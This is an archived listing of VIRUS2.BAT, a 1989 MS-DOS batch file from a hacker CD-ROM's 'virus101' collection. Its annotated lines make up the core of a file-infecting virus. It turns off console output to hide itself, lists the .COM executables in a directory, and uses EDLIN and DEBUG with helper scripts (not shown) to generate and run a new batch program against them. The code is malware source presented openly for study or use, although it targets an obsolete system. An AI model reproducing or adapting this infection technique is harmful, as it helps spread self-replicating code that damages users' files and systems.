home *** CD-ROM | disk | FTP | other *** search
/ HaCKeRz Kr0nlcKLeZ 1 / HaCKeRz Kr0nlcKLeZ.iso / chibacity / virus101.arj / VIRUS2.BAT < prev    next >
Encoding:
DOS Batch File  |  1989-08-09  |  583 b   |  12 lines

  1.  
  2. echo = off         ( Self explanatory)
  3. ctty nul           ( This is important. Console output is turned off)
  4. path c:\msdos      ( May differ on other systems )
  5. dir *.com/w>ind    ( The directory is written on "ind" ONLY name entries)      
  6. edlin ind<1        ( "Ind" is processed with EDLIN so only file names appear)
  7. debug ind<2        ( New batch program is created with debug)
  8. edlin name.bat<3   ( This batch goes to an executable form because of EDLIN)
  9. ctty con           ( Console interface is again assigned)
  10. name               ( Newly created NAME.BAT is called.
  11.  
  12.